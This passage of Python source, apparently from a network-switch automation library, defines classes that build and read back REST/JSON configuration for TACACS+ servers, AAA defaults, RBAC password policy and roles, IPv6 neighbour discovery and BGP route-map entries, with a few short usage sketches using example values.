self.tacacs_obj = 'aaaTacacsPlusEp'
self.deadtime = None
self.timeout = None
self.src_int = None
self.key = None
self.key_enc = None
self.servers = []
self.groups = []
def set_deadtime(self, deadtime):
self.deadtime = deadtime
def set_timeout(self, timeout):
self.timeout = timeout
def set_key(self, key, key_enc=None):
self.key = key
if key_enc:
self.key_enc = key_enc
def set_src_interface(self, src_int):
self.src_int = src_int
def add_host(self, name, key=None, key_enc=None, port=None,
timeout=None):
host = AaaTacacsProvider(name, key, key_enc, port, timeout)
self._children.append(host)
self.servers.append(host)
def add_group(self, name, vrf=None, deadtime=None, server=None):
group = AaaTacacsProviderGroup(name, vrf, deadtime, server)
self._children.append(group)
self.groups.append(group)
def _get_attributes(self):
att = {}
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.src_int:
att['srcIf'] = self.src_int
if self.timeout:
att['timeout'] = self.timeout
if self.deadtime:
att['deadtime'] = self.deadtime
return att
def get_url(self):
""" Return Tacacs+ server url """
return '/api/node/mo/sys/userext/tacacsext.json'
def get_json(self):
return super(AaaTacacs, self).get_json(obj_class=self.tacacs_obj,
attributes=self._get_attributes())
def _get_grp_info(self, resp, tacacs):
tac_grp_obj = 'aaaTacacsPlusProviderGroup'
grp_att = resp[tac_grp_obj]['attributes']
if resp[tac_grp_obj].get('children'):
g_children = resp[tac_grp_obj]['children']
for gg_child in g_children:
if gg_child.get('aaaProviderRef'):
server = str(gg_child['aaaProviderRef']['attributes']
['name'])
if server:
tacacs.add_group(name=str(grp_att['name']),
vrf=str(grp_att['vrf']),
deadtime=str(grp_att['deadtime']),
server=server)
else:
tacacs.add_group(name=str(grp_att['name']),
vrf=str(grp_att['vrf']),
deadtime=str(grp_att['deadtime']))
@classmethod
def get(cls, session, host_name=None, grp_name=None):
"""
:param session: Session object to communicate with Switch
:return Tacacs object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if host_name and grp_name:
            raise TypeError('Provide either hostname or groupname')
tac_obj = 'aaaTacacsPlusEp'
tac_prov_obj = 'aaaTacacsPlusProvider'
tac_grp_obj = 'aaaTacacsPlusProviderGroup'
tacacs = AaaTacacs()
if host_name:
query_url = ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovid'
'er-' + host_name + '.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
prov_att = ret[tac_prov_obj]['attributes']
tacacs.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
port=str(prov_att['port']))
elif grp_name:
query_url = ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovid'
'ergroup-' + grp_name + '.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
tacacs._get_grp_info(ret, tacacs)
else:
query_url = ('/api/node/mo/sys/userext/tacacsext.json?rsp-subtree'
'=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
tac_att = ret[tac_obj]['attributes']
tacacs.set_deadtime(str(tac_att['deadtime']))
tacacs.set_timeout(str(tac_att['timeout']))
tacacs.set_src_interface(str(tac_att['srcIf']))
children = ret[tac_obj]['children']
for child in children:
if child.get(tac_prov_obj):
prov_att = child[tac_prov_obj]['attributes']
tacacs.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
port=str(prov_att['port']))
elif child.get(tac_grp_obj):
tacacs._get_grp_info(child, tacacs)
return tacacs
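# Hypothetical usage sketch: how the TACACS+ classes above can be combined.
# Method names come from AaaTacacs as defined in this module; the server
# address, key, port and group name are assumed example values.
def _example_build_tacacs_config():
    """Sketch: assemble a TACACS+ endpoint payload for the switch REST API."""
    tacacs = AaaTacacs()
    tacacs.set_timeout('10')
    tacacs.set_deadtime('5')
    tacacs.add_host('192.0.2.10', key='tac-secret', port='49')
    tacacs.add_group('tac-grp', vrf='management', server='192.0.2.10')
    # The JSON body could then be POSTed to tacacs.get_url() via a Session.
    return tacacs.get_url(), tacacs.get_json()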
class AaaAaa(BaseNXObject):
"""
This class defines User AAA configuration
"""
def __init__(self, session=None, parent=None):
super(AaaAaa, self).__init__(name='')
self._session= session
self._parent = parent
self.aaa_obj = 'aaaAuthRealm'
self.errEn = None
self.auth_protocol = None
self.auth_prov_grp = None
self.cmd_type = 'exec'
self.author_prov_grp = None
self.acc_prov_grp = None
def enable_auth_login(self, login_data):
if login_data == 'error-enable':
self.errEn = 'yes'
elif login_data == 'ascii-authentication':
self.auth_protocol = 'ascii'
def disable_auth_login(self, login_data):
if login_data == 'error-enable':
self.errEn = 'no'
elif login_data == 'ascii-authentication':
self.auth_protocol = 'pap'
def set_auth_default_grp(self, name=None):
if name:
self.auth_prov_grp = name
else:
self.auth_prov_grp = ''
def set_author_default_grp(self, name=None, cmd_type=None):
if name:
self.author_prov_grp = name
else:
self.author_prov_grp = ''
if cmd_type in ['config', 'exec']:
self.cmd_type = cmd_type
def set_acc_default_grp(self, name=None):
if name:
self.acc_prov_grp = name
else:
self.acc_prov_grp = ''
def _get_child_attributes(self):
child = []
auth = {"aaaDefaultAuth":{"attributes":{}}}
auth['aaaDefaultAuth']['attributes'][
'authProtocol'] = self.auth_protocol
auth['aaaDefaultAuth']['attributes'][
'errEn'] = self.errEn
auth['aaaDefaultAuth']['attributes'][
'providerGroup'] = self.auth_prov_grp
child.append(auth)
author = {"aaaDefaultAuthor":{"attributes": {}}}
author['aaaDefaultAuthor']['attributes'][
'cmdType'] = self.cmd_type
author['aaaDefaultAuthor']['attributes'][
'providerGroup'] = self.author_prov_grp
child.append(author)
acc = {"aaaDefaultAcc": {"attributes": {}}}
acc['aaaDefaultAcc']['attributes'][
'providerGroup'] = self.acc_prov_grp
child.append(acc)
return child
def get_url(self):
""" Return AAA url """
return '/api/node/mo/sys/userext/authrealm.json'
def get_json(self):
return super(AaaAaa, self).get_json(obj_class=self.aaa_obj,
attributes={},
children=self._get_child_attributes())
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return AAA object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
aaa_obj = 'aaaAuthRealm'
aaa = AaaAaa()
query_url = '/api/node/mo/sys/userext/authrealm.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
aaa_child = ret[aaa_obj]['children']
for child in aaa_child:
if child.get('aaaDefaultAuth'):
auth_att = child['aaaDefaultAuth']['attributes']
if not auth_att['providerGroup']:
aaa.set_auth_default_grp(name='local')
else:
aaa.set_auth_default_grp(name=str(auth_att[
'providerGroup']))
if auth_att['authProtocol']=='ascii':
aaa.enable_auth_login('ascii-authentication')
else:
aaa.disable_auth_login('ascii-authentication')
if auth_att['errEn']=='yes':
aaa.enable_auth_login('error-enable')
else:
aaa.disable_auth_login('error-enable')
elif child.get('aaaDefaultAuthor'):
author_att = child['aaaDefaultAuthor']['attributes']
if not author_att['providerGroup']:
aaa.set_author_default_grp(name='local',
cmd_type=str(author_att['cmdType']))
else:
aaa.set_author_default_grp(
name=str(author_att['providerGroup']),
cmd_type=str(author_att['cmdType']))
elif child.get('aaaDefaultAcc'):
acc_att = child['aaaDefaultAcc']['attributes']
if not acc_att['providerGroup']:
aaa.set_acc_default_grp('local')
else:
aaa.set_acc_default_grp(name=str(acc_att
['providerGroup']))
return aaa
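# Hypothetical usage sketch: pointing the default AAA methods at a provider
# group using the AaaAaa setters above; 'tac-grp' is an assumed group name.
def _example_build_aaa_config():
    """Sketch: default authentication, authorization and accounting groups."""
    aaa = AaaAaa()
    aaa.enable_auth_login('error-enable')
    aaa.set_auth_default_grp('tac-grp')
    aaa.set_author_default_grp('tac-grp', cmd_type='exec')
    aaa.set_acc_default_grp('tac-grp')
    return aaa.get_url(), aaa.get_json()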
class RBAC(BaseNXObject):
"""
This class defines RBAC configuration
"""
def __init__(self, session=None, parent=None):
super(RBAC, self).__init__(name="")
self._session= session
self._parent = parent
self.rbac_obj = 'aaaUserEp'
self.pwd_max_len = None
self.pwd_min_len = None
self.pwd_secure_mode = None
self.pwd_strength_check = 'yes'
self.roles = []
self.users = []
def set_pwd_max_length(self, max_len):
self.pwd_max_len = max_len
def set_pwd_min_length(self, min_len):
self.pwd_min_len = min_len
def enable_pwd_strength_check(self):
self.pwd_strength_check = 'yes'
def disable_pwd_strength_check(self):
self.pwd_strength_check = 'no'
def enable_pwd_secure_mode(self):
self.pwd_secure_mode = 'yes'
def disable_pwd_secure_mode(self):
self.pwd_secure_mode = 'no'
def create_role(self, name):
role = AaaRole(name)
self._children.append(role)
self.roles.append(role)
def add(self, obj):
self._children.append(obj)
if isinstance(obj, AaaUser):
self.users.append(obj)
def _get_attributes(self):
att = {}
if self.pwd_max_len:
att['pwdMaxLength'] = self.pwd_max_len
if self.pwd_min_len:
att['pwdMinLength'] = self.pwd_min_len
if self.pwd_secure_mode:
att['pwdSecureMode'] = self.pwd_secure_mode
if self.pwd_strength_check:
att['pwdStrengthCheck'] = self.pwd_strength_check
return att
def get_url(self):
""" Return RBAC url """
return '/api/node/mo/sys/userext.json'
def get_json(self):
return super(RBAC, self).get_json(obj_class=self.rbac_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, role_name=None):
"""
:param session: Session object to communicate with Switch
:return RBAC object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
rbac_obj = 'aaaUserEp'
rbac = RBAC()
if role_name:
query_url = ('/api/node/mo/sys/userext/role-' + role_name +
'.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rbac.create_role(str(ret['aaaRole']['attributes']['name']))
else:
query_url = '/api/node/mo/sys/userext.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
rbac_att = ret[rbac_obj]['attributes']
rbac.set_pwd_max_length(str(rbac_att['pwdMaxLength']))
rbac.set_pwd_min_length(str(rbac_att['pwdMinLength']))
if rbac_att['pwdSecureMode'] == 'yes':
rbac.enable_pwd_secure_mode()
else:
                    rbac.disable_pwd_secure_mode()
if rbac_att['pwdStrengthCheck'] == 'yes':
rbac.enable_pwd_strength_check()
else:
rbac.disable_pwd_strength_check()
if ret[rbac_obj].get('children'):
for child in ret[rbac_obj]['children']:
if child.get('aaaRole'):
rbac.create_role(str(child['aaaRole']
['attributes']['name']))
if child.get('aaaUser'):
user_att = child['aaaUser']['attributes']
user = AaaUser(str(user_att['name']))
children = child['aaaUser']['children']
for g_child in children:
if g_child.get('aaaUserDomain'):
for roles in g_child['aaaUserDomain'][
'children']:
user.set_role(str(roles['aaaUserRole']
['attributes']['name']))
if g_child.get('aaaSshAuth'):
user.set_ssh_key(str(g_child['aaaSshAuth']
['attributes']['data']))
rbac.add(user)
return rbac
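# Hypothetical usage sketch: building a password policy and a custom role
# with the RBAC methods above; the role name and lengths are assumed values.
def _example_build_rbac_config():
    """Sketch: password policy plus one user-defined role."""
    rbac = RBAC()
    rbac.set_pwd_min_length('8')
    rbac.set_pwd_max_length('64')
    rbac.enable_pwd_strength_check()
    rbac.create_role('network-monitor')
    return rbac.get_url(), rbac.get_json()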
class NdPrefix(BaseNXObject):
"""
This class defines neighbor discovery prefix configuration
"""
    def __init__(self, interface, address, lifetime=None, pref_lifetime=None,
                 session=None, parent=None):
        super(NdPrefix, self).__init__(name="")
        self.prefix_obj = 'ndPfx'
        self.address = address
        self.interface = interface
self.lifetime = lifetime
self.pref_lifetime = pref_lifetime
def _get_attributes(self):
att = {}
att['addr'] = self.address
if self.lifetime and self.pref_lifetime:
att['lifetime'] = self.lifetime
att['prefLifetime'] = self.pref_lifetime
return att
def get_url(self):
""" Return Neighbor Discovery interface prefix url """
        return ('/api/node/mo/sys/nd/inst/dom-default/if-[' + self.interface +
                ']/pfx-[' + self.address + '].json')
def get_json(self):
return super(NdPrefix, self).get_json(obj_class=self.prefix_obj,
attributes=self._get_attributes())
class NdInterface(BaseNXObject):
"""
This class defines neighbor discovery interface configuration
"""
def __init__(self, id, session=None, parent=None):
super(NdInterface, self).__init__(name="")
self._session= session
self._parent = parent
self.nd_int_obj = 'ndIf'
self.id = id
self.redirect_st = None
self.ra_interval = None
self.prefixes = []
def set_ra_interval(self, interval):
self.ra_interval = interval
def enable_redirect(self):
self.redirect_st = 'redirects'
def disable_redirect(self):
self.redirect_st = '-'
def set_prefix(self, address, lifetime=None, pref_lifetime=None):
if lifetime and not pref_lifetime:
raise TypeError("Provide both lifetime and preferred lifetime")
        elif lifetime and (int(lifetime) < int(pref_lifetime)):
            raise TypeError("lifetime must be greater than or equal to "
                            + "preferred lifetime")
prefix = NdPrefix(self.id, address, lifetime, pref_lifetime)
self._children.append(prefix)
self.prefixes.append(prefix)
def _get_attributes(self):
att = {}
att['id'] = self.id
if self.redirect_st == '-':
self.redirect_st = ''
if self.redirect_st in ['', 'redirects']:
att['ctrl'] = self.redirect_st
if self.ra_interval:
att['raIntvl'] = self.ra_interval
return att
def get_url(self):
""" Return Neighbor Discovery Interface url """
return ('/api/node/mo/sys/nd/inst/dom-default/if-[' + self.id +
'].json')
def get_json(self):
return super(NdInterface, self).get_json(obj_class=self.nd_int_obj,
attributes=self._get_attributes())
def _get_int_details(self, nd_iface, resp):
nd_int_obj = 'ndIf'
int_att = resp[nd_int_obj]['attributes']
nd_iface.set_ra_interval(str(int_att['raIntvl']))
if str(int_att['ctrl']) == 'redirects':
nd_iface.enable_redirect()
else:
nd_iface.disable_redirect()
if resp[nd_int_obj].get('children'):
for child in resp[nd_int_obj]['children']:
pre_att = child['ndPfx']['attributes']
nd_iface.set_prefix(str(pre_att['addr']),
str(pre_att['lifetime']),
str(pre_att['prefLifetime']))
@classmethod
def get(cls, session, interface):
"""
:param session: Session object to communicate with Switch
:return ND Interface object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
nd_int_obj = 'ndIf'
query_url = ('/api/node/mo/sys/nd/inst/dom-default/if-[' + interface
+ '].json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
int_att = ret[nd_int_obj]['attributes']
nd_iface = NdInterface(str(int_att['id']))
nd_iface._get_int_details(nd_iface, ret)
return nd_iface
class ND(BaseNXObject):
"""
This class defines neighbor discovery configuration
"""
def __init__(self, session=None, parent=None):
super(ND, self).__init__(name="")
self._session= session
self._parent = parent
self.nd_obj = 'ndDom'
self.interfaces = []
def add(self, int_obj):
self._children.append(int_obj)
self.interfaces.append(int_obj)
def get_url(self):
""" Return Neighbor Discovery url """
return '/api/node/mo/sys/nd/inst/dom-default.json'
def get_json(self):
return super(ND, self).get_json(obj_class=self.nd_obj,
attributes={})
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return ND object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
nd_obj = 'ndDom'
nd_int_obj = 'ndIf'
nd = ND()
query_url = ('/api/node/mo/sys/nd/inst/dom-default.json?rsp-' +
'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
nd_int = ret[nd_obj]['children']
for child in nd_int:
int_att = child[nd_int_obj]['attributes']
nd_iface = NdInterface(str(int_att['id']))
nd_iface._get_int_details(nd_iface, child)
nd.add(nd_iface)
return nd
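# Hypothetical usage sketch: composing NdInterface and ND objects as defined
# above; the interface id, RA interval and prefix are assumed example values.
def _example_build_nd_config():
    """Sketch: one ND interface advertising a single prefix."""
    iface = NdInterface('eth1/1')
    iface.set_ra_interval('600')
    iface.enable_redirect()
    iface.set_prefix('2001:db8::/64', lifetime='1800', pref_lifetime='900')
    nd = ND()
    nd.add(iface)
    return nd.get_url(), nd.get_json()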
class MatchRtType(BaseNXObject):
"""
This class defines match route type configuration
"""
def __init__(self, name, seq_no, type, session=None, parent=None):
super(MatchRtType, self).__init__(name)
self._session= session
self._parent = parent
self.rt_type_obj = 'rtmapMatchRtType'
self.name = name
self.seq_no = seq_no
self.type = type
def _get_attributes(self):
att = {}
att['routeT'] = self.type
return att
def get_url(self):
""" Return match route type url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrttype-' + self.type + '.json')
def get_json(self):
return super(MatchRtType, self).get_json(obj_class=self.rt_type_obj,
attributes=self._get_attributes())
class MatchRtTag(BaseNXObject):
"""
This class defines match route tag configuration
"""
def __init__(self, name, seq_no, tag, session=None, parent=None):
super(MatchRtTag, self).__init__(name)
self._session= session
self._parent = parent
self.rt_tag_obj = 'rtmapMatchRtTag'
self.name = name
self.seq_no = seq_no
self.tag = tag
def _get_attributes(self):
att = {}
att['tag'] = self.tag
return att
def get_url(self):
""" Return match route tag url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrttag-' + self.tag + '.json')
def get_json(self):
return super(MatchRtTag, self).get_json(obj_class=self.rt_tag_obj,
attributes=self._get_attributes())
class SetPeerAddr(BaseNXObject):
"""
This class defines set peer address configuration
"""
def __init__(self, name, seq_no, version='v4', state='disabled',
session=None, parent=None):
super(SetPeerAddr, self).__init__(name)
self._session= session
self._parent = parent
self.peer_obj = 'rtmapSetNhPeerAddr'
self.name = name
self.seq_no = seq_no
self.version = version
self.state = state
def _get_attributes(self):
att = {}
if self.version == 'v4':
att['v4PeerAddr'] = self.state
if self.version == 'v6':
att['v6PeerAddr'] = self.state
return att
def get_url(self):
""" Return set peer address url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/nhpa.json')
def get_json(self):
return super(SetPeerAddr, self).get_json(obj_class=self.peer_obj,
attributes=self._get_attributes())
class SetNextHop(BaseNXObject):
"""
This class defines set next hop address configuration
"""
def __init__(self, name, seq_no, addr, session=None, parent=None):
super(SetNextHop, self).__init__(name)
self._session= session
self._parent = parent
self.nh_obj = 'rtmapSetNh'
self.name = name
self.seq_no = seq_no
self.addr = addr
def _get_attributes(self):
att = {}
att['addr'] = self.addr
return att
def get_url(self):
""" Return set next hop address url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/nh-[' + self.addr + '].json')
def get_json(self):
return super(SetNextHop, self).get_json(obj_class=self.nh_obj,
attributes=self._get_attributes())
class SetLocalPref(BaseNXObject):
"""
This class defines set local preference configuration
"""
def __init__(self, name, seq_no, local_pref, session=None, parent=None):
super(SetLocalPref, self).__init__(name)
self._session= session
self._parent = parent
self.pref_obj = 'rtmapSetPref'
self.name = name
self.seq_no = seq_no
self.local_pref = local_pref
def _get_attributes(self):
att = {}
att['localPref'] = self.local_pref
return att
def get_url(self):
""" Return set local preference url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/spref.json')
def get_json(self):
return super(SetLocalPref, self).get_json(obj_class=self.pref_obj,
attributes=self._get_attributes())
class SetOrigin(BaseNXObject):
"""
This class defines set origin configuration
"""
def __init__(self, name, seq_no, origin, session=None, parent=None):
super(SetOrigin, self).__init__(name)
self._session= session
self._parent = parent
self.origin_obj = 'rtmapSetOrigin'
self.name = name
self.seq_no = seq_no
self.origin = origin
def _get_attributes(self):
att = {}
att['originT'] = self.origin
return att
def get_url(self):
""" Return set origin url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/origin.json')
def get_json(self):
return super(SetOrigin, self).get_json(obj_class=self.origin_obj,
attributes=self._get_attributes())
class SetCommList(BaseNXObject):
"""
This class defines set community-list configuration
"""
def __init__(self, name, seq_no, comm_name, delete=None, session=None,
parent=None):
super(SetCommList, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtmapSetCommList'
self.name = name
self.seq_no = seq_no
self.comm_name = comm_name
        if delete:
            self.delete = 'enabled'
        else:
            self.delete = None
def _get_attributes(self):
att = {}
att['name'] = self.comm_name
if self.delete:
att['delete'] = self.delete
else:
att['delete'] = 'disabled'
return att
def get_url(self):
""" Return set community-list url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/scommlist.json')
def get_json(self):
return super(SetCommList, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class RtmapRs(BaseNXObject):
"""
This class defines Route-map Match name configuration
"""
def __init__(self, name, seq_no, rs_obj, rs_name, session=None,
parent=None):
super(RtmapRs, self).__init__(name=rs_name)
self._session= session
self._parent = parent
self.name = name
self.seq_no = seq_no
self.rs_obj = rs_obj
self.rs_name = rs_name
def _get_attributes(self):
att = {}
if self.rs_obj == 'rtmapRsRtAsPathAccAtt':
att['tDn'] = 'sys/rpm/accesslist-' + self.rs_name
elif self.rs_obj == 'rtmapRsRtDstAtt':
att['tDn'] = 'sys/rpm/pfxlistv4-' + self.rs_name
elif self.rs_obj == 'rtmapRsRtDstV6Att':
att['tDn'] = 'sys/rpm/pfxlistv6-' + self.rs_name
elif self.rs_obj == 'rtmapRsRegCommAtt':
att['tDn'] = 'sys/rpm/rtregcom-' + self.rs_name
return att
def get_url(self):
""" Return Route-map Match name url """
if self.rs_obj == 'rtmapRsRtAsPathAccAtt':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtacclist/rsrtAsPathAccAtt-[sys/rpm/' +
'accesslist-' + self.rs_name + '].json')
elif self.rs_obj == 'rtmapRsRtDstAtt':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdst/rsrtDstAtt-[sys/rpm/pfxlistv4-' +
self.rs_name + '].json')
elif self.rs_obj == 'rtmapRsRtDstV6Att':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdstv6/rsrtDstV6Att-[sys/rpm/pfxlistv6-'
+ self.rs_name + '].json')
elif self.rs_obj == 'rtmapRsRegCommAtt':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mregcomm/rsregCommAtt-[sys/rpm/rtregcom-'
+ self.rs_name + '].json')
def get_json(self):
return super(RtmapRs, self).get_json(obj_class=self.rs_obj,
attributes=self._get_attributes())
class RtmapMatch(BaseNXObject):
"""
This class defines Route-map Match configuration
"""
def __init__(self, name, seq_no, match_obj, match_name,
match_criteria=None, session=None, parent=None):
super(RtmapMatch, self).__init__(name)
self._session= session
self._parent = parent
self.name = name
self.seq_no = seq_no
self.match_obj = match_obj
self.criteria = match_criteria
if self.match_obj == 'rtmapMatchAsPathAccessList':
self.child_obj = 'rtmapRsRtAsPathAccAtt'
elif self.match_obj == 'rtmapMatchRtDst':
self.child_obj = 'rtmapRsRtDstAtt'
elif self.match_obj == 'rtmapMatchRtDstV6':
self.child_obj = 'rtmapRsRtDstV6Att'
elif self.match_obj == 'rtmapMatchRegComm':
self.child_obj = 'rtmapRsRegCommAtt'
else:
raise TypeError("Provide proper object name")
self.matches = []
self.add(self.child_obj, match_name)
def add(self, match_child_obj, match_name):
rtmaprs = RtmapRs(self.name, self.seq_no, match_child_obj, match_name)
self._children.append(rtmaprs)
self.matches.append(rtmaprs)
def _get_attributes(self):
att = {}
if self.criteria:
att['criteria'] = self.criteria
return att
def get_url(self):
""" Return Route-map Match url """
if self.match_obj == 'rtmapMatchAsPathAccessList':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtacclist.json')
elif self.match_obj == 'rtmapMatchRtDst':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdst.json')
elif self.match_obj == 'rtmapMatchRtDstV6':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdstv6.json')
elif self.match_obj == 'rtmapMatchRegComm':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mregcomm.json')
def get_json(self):
return super(RtmapMatch, self).get_json(obj_class=self.match_obj,
attributes=self._get_attributes())
class RegCom(BaseNXObject):
"""
This class defines community configuration
"""
def __init__(self, name, seq_no, community, session=None, parent=None):
super(RegCom, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomItem'
self.name = name
self.seq_no = seq_no
if community == 'internet':
self.community = '0:0'
elif community == 'local-AS':
self.community = '65535:65283'
elif community == 'no-advertise':
self.community = '65535:65282'
elif community == 'no-export':
self.community = '65535:65281'
else:
self.community = community
def _get_attributes(self):
att = {}
att['community'] = 'regular:as2-nn2:' + self.community
return att
def get_url(self):
""" Return set community url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/sregcomm/item-regular:as2-nn2:' +
self.community +'.json')
def get_json(self):
return super(RegCom, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class SetRegCom(BaseNXObject):
"""
This class defines set community configuration
"""
def __init__(self, name, seq_no, community, session=None, parent=None):
super(SetRegCom, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtmapSetRegComm'
self.name = name
self.seq_no = seq_no
community = community.split(',')
if 'additive' in community:
self.additive = 'enabled'
community.remove('additive')
else:
self.additive = None
self.communities = []
self.add_comm_item(community)
def add_comm_item(self, community):
for comm in community:
reg_comm = RegCom(self.name, self.seq_no, comm)
self._children.append(reg_comm)
self.communities.append(reg_comm)
def _get_attributes(self):
att = {}
if self.additive:
att['additive'] = self.additive
else:
att['additive'] = 'disabled'
return att
def get_url(self):
""" Return set community url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/sregcomm.json')
def get_json(self):
return super(SetRegCom, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class RouteMapEntry(BaseNXObject):
"""
This class defines Route-map entry configuration
"""
def __init__(self, action='permit', seq_no='10', session=None,
parent=None):
super(RouteMapEntry, self).__init__(name='')
self._session= session
self._parent = parent
self.rtmap_entry_obj = 'rtmapEntry'
self.action = action
self.seq_no = seq_no
self.descr = None
self.comm_list = []
self.v6_prefix_list = []
self.v4_prefix_list = []
self.as_paths = []
self.community = []
self.next_hops = []
self.rt_types = []
self.rt_tags = []
self.local_preferences = []
self.origin = []
def set_descr(self, descr):
self.descr = descr
def _get_attributes(self):
att = {}
att['action'] = self.action
att['order'] = self.seq_no
if self.descr:
att['descr'] = self.descr
return att
def match_rt_type(self, type):
match_type = MatchRtType(self.name, self.seq_no, type)
self._children.append(match_type)
self.rt_types.append(match_type)
def match_rt_tag(self, tag):
match_tag = MatchRtTag(self.name, self.seq_no, tag)
self._children.append(match_tag)
self.rt_tags.append(match_tag)
def enable_nh_peer(self, version):
nh_peer = SetPeerAddr(self.name, self.seq_no, version,
state='enabled')
self._children.append(nh_peer)
def disable_nh_peer(self, version):
nh_peer = SetPeerAddr(self.name, self.seq_no, version,
state='disabled')
self._children.append(nh_peer)
def set_next_hop(self, addr):
nxt_hop_addr = SetNextHop(self.name, self.seq_no, addr)
self._children.append(nxt_hop_addr)
self.next_hops.append(nxt_hop_addr)
def set_local_pref(self, local_pref):
local_pref = SetLocalPref(self.name, self.seq_no, local_pref)
self._children.append(local_pref)
self.local_preferences.append(local_pref)
def set_origin(self, origin):
origin = SetOrigin(self.name, self.seq_no, origin)
self._children.append(origin)
self.origin.append(origin)
def set_comm_list(self, name, delete):
comm_list = SetCommList(self.name, self.seq_no, name, delete)
self._children.append(comm_list)
self.comm_list.append(comm_list)
def match_as_path(self, name):
as_path_obj = 'rtmapMatchAsPathAccessList'
match_obj = RtmapMatch(self.name, self.seq_no, as_path_obj, name)
self._children.append(match_obj)
self.as_paths.append(match_obj)
def match_pfxlistv4(self, name):
pfx_v4_obj = 'rtmapMatchRtDst'
match_obj = RtmapMatch(self.name, self.seq_no, pfx_v4_obj, name)
self._children.append(match_obj)
self.v4_prefix_list.append(match_obj)
def match_pfxlistv6(self, name):
pfx_v6_obj = 'rtmapMatchRtDstV6'
match_obj = RtmapMatch(self.name, self.seq_no, pfx_v6_obj, name)
self._children.append(match_obj)
self.v6_prefix_list.append(match_obj)
def match_comm(self, name, criteria='sub-group'):
match_comm_obj = 'rtmapMatchRegComm'
match_obj = RtmapMatch(self.name, self.seq_no, match_comm_obj, name,
criteria)
self._children.append(match_obj)
self.community.append(match_obj)
def set_comm(self, community):
set_comm = SetRegCom(self.name, self.seq_no, community)
self._children.append(set_comm)
def get_url(self):
""" Return Route-map entry url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '.json')
def get_json(self):
return super(RouteMapEntry, self).get_json(
obj_class=self.rtmap_entry_obj,
attributes=self._get_attributes())
class RouteMap(BaseNXObject):
"""
This class defines Route-map configuration
"""
def __init__(self, name, session=None, parent=None):
super(RouteMap, self).__init__(name)
self._session= session
self._parent = parent
self.rtmap_obj = 'rtmapRule'
self.name = name
self.rt_map_entries = []
def add(self, rt_obj):
self._children.append(rt_obj)
self.rt_map_entries.append(rt_obj)
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_url(self):
""" Return Route-map url """
return '/api/node/mo/sys/rpm/rtmap-' + self.name + '.json'
def get_json(self):
return super(RouteMap, self).get_json(obj_class=self.rtmap_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name):
"""
:param session: Session object to communicate with Switch
:return Route-map object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
rt_map_obj = 'rtmapRule'
query_url = ('/api/node/mo/sys/rpm/rtmap-' + name + '.json?rsp-'
+ 'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rt_map = RouteMap(str(ret[rt_map_obj]['attributes']['name']))
if ret[rt_map_obj].get('children'):
for child in ret[rt_map_obj]['children']:
map_att = child['rtmapEntry']['attributes']
map = RouteMapEntry(str(map_att['action']),
str(map_att['order']))
map.set_descr(str(map_att['descr']))
if child['rtmapEntry'].get('children'):
for g_child in child['rtmapEntry']['children']:
if g_child.get('rtmapMatchRtDstV6'):
